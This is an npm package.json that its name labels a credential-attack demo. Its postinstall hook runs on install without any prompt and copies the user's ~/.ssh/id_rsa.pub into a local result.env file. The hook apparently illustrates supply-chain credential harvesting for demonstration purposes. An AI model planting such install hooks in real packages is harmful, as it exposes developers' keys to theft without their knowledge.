{
  "name": "development-machine-credencial-attack-demo-npm",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "postinstall": "cat ~/.ssh/id_rsa.pub > result.env",
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC"
}
